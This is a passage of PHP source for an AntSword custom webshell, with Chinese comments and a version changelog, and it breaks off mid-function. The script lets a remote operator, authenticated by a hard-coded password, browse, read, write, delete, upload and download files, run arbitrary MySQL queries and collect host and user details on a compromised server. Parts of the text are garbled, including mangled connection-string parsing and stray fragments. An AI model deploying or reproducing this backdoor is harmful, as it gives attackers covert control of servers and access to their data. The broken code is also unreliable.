123456
* * 4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致,如果选择 default 则需要将 encoder 值设置为空 * * ChangeLog: * Data: 2021/02/24 v1.5 * 1. 修复 5.2.* 版本语法不兼容问题 * * Date: 2020/03/26 v1.4 * 1. 修复由于decode函数与EC函数位置写反而导致的乱码问题 * 2. 增加动态修改字符编码接口 * * Date: 2019/05/22 v1.3 * 1. 支持 mysqli 连接非默认端口 * * Date: 2019/04/05 v1.2 * 1. 新增 listcmd 接口 * 2. 新增数据库支持函数检查接口 * * Date: 2016/05/13 v1.1 * 1. 执行 DML 语句,显示执行状态 * * Date: 2016/04/06 v1.0 * 1. 文件系统 和 terminal 管理 * 2. mysql 数据库支持 * 3. 支持 base64 和 hex 编码 **/ $pwd = "ant"; //连接密码 //数据编码 3 选 1 $encoder = ""; // default // $encoder = "base64"; //base64 // $encoder = "hex"; // hex //$cs = "UTF-8"; $cs=isset($_REQUEST['charset'])?$_REQUEST['charset']:"UTF-8"; /** * 字符编码处理 **/ function EC($s){ global $cs; $sencode = mb_detect_encoding($s, array("ASCII","UTF-8","GB2312","GBK",'BIG5')); $ret = ""; try { $ret = mb_convert_encoding($s, $cs, $sencode); } catch (Exception $e) { try { $ret = iconv($sencode, $cs, $s); } catch (Exception $e) { $ret = $s; } } return $ret; } /*传输解码*/ function decode($s){ global $encoder; $ret = ""; switch ($encoder) { case 'base64': $ret = base64_decode($s); break; case 'hex': for ($i=0; $i < strlen($s)-1; $i+=2) { $output = substr($s, $i, 2); $decimal = intval($output, 16); $ret .= chr($decimal); } break; default: $ret = $s; break; } return $ret; } function showDatabases($encode, $conf){ $sql = "show databases"; $columnsep = "\t"; $rowsep = ""; return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false); } function showTables($encode, $conf, $dbname){ $sql = "show tables from ".$dbname; // mysql $columnsep = "\t"; $rowsep = ""; return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false); } function showColumns($encode, $conf, $dbname, $table){ $columnsep = "\t"; $rowsep = ""; $sql = "select * from ".$dbname.".".$table." limit 0,0"; // mysql return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true); } function query($encode, $conf, $sql){ $columnsep = "\t|\t"; // general $rowsep = "\r\n"; return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true); } function executeSQL($encode, $conf, $sql, $columnsep, $rowsep, $needcoluname){ $ret = ""; $m=get_magic_quotes_gpc(); if ($m) { $conf = stripslashes($conf); } $conf = (EC($conf)); /*root
*/ $host=""; $user=""; $password=""; if (preg_match('/(.+?)<\/P>/i', $conf, $data)) {
$password = $data[1];
}
$encode = decode(EC($encode));
list($host, $port) = split(":", $host);
$port == "" ? $port = "3306" : $port;
$conn = @mysqli_connect($host, $user, $password, "", $port);
$res = @mysqli_query($conn, $sql);
if (is_bool($res)) {
return "Status".$columnsep.$rowsep.($res?"True":"False").$columnsep.$rowsep;
}
$i=0;
if ($needcoluname) {
while ($col=@mysqli_fetch_field($res)) {
$ret .= $col->name.$columnsep;
$i++;
}
$ret .= $rowsep;
}
while($rs=@mysqli_fetch_row($res)){
for($c = 0; $c <= $i; $c++){
$ret .= trim($rs[$c]).$columnsep;
}
$ret.=$rowsep;
}
return $ret;
}
function BaseInfo(){
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D==""){
$D=dirname($_SERVER["PATH_TRANSLATED"]);
}
$R="{$D}\t";
if(substr($D,0,1)!="/"){
foreach(range("C","Z")as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
}else{
$R.="/";
}
$R.="\t";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="\t{$s}";
return $R;
}
function FileTreeCode($D){
$ret = "";
$F=@opendir($D);
if($F==NULL){
$ret = "ERROR:// Path Not Found Or No Permission!";
}else{
$M=NULL;
$L=NULL;
while($N=@readdir($F)){
$P=$D."/".$N;
$T=@date("Y-m-d H:i:s",@filemtime($P));
@$E=substr(base_convert(@fileperms($P),10,8),-4);
$R="\t".$T."\t".@filesize($P)."\t".$E."\n";
if(@is_dir($P))
$M.=$N."/".$R;
else
$L.=$N.$R;
}
$ret .= $M.$L;
@closedir($F);
}
return $ret;
}
function ReadFileCode($F){
$ret = "";
try {
$P = @fopen($F,"r");
$ret = (@fread($P,filesize($F)));
@fclose($P);
} catch (Exception $e) {
$ret = "ERROR://".$e;
}
return $ret;
}
function WriteFileCode($path, $content){
return @fwrite(fopen(($path),"w"),($content))?"1":"0";
}
function DeleteFileOrDirCode($fileOrDirPath){
function df($p){
$m=@dir($p);
while(@$f=$m->read()){
$pf=$p."/".$f;
if((is_dir($pf))&&($f!=".")&&($f!="..")){
@chmod($pf,0777);
df($pf);
}
if(is_file($pf)){
@chmod($pf,0777);
@unlink($pf);
}
}
$m->close();
@chmod($p,0777);
return @rmdir($p);
}
$F=(get_magic_quotes_gpc()?stripslashes($fileOrDirPath):$fileOrDirPath);
if(is_dir($F)){
return (df($F));
}
else{
return (file_exists($F)?@unlink($F)?"1":"0":"0");
}
}
function DownloadFileCode($filePath){
$F=(get_magic_quotes_gpc()?stripslashes($filePath):$filePath);
$fp=@fopen($F,"r");
if(@fgetc($fp)){
@fclose($fp);
@readfile($F);
}else{
echo("ERROR:// Can Not Read");
}
}
function UploadFileCode($path, $content){
$f=$path;
$c=$content;
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i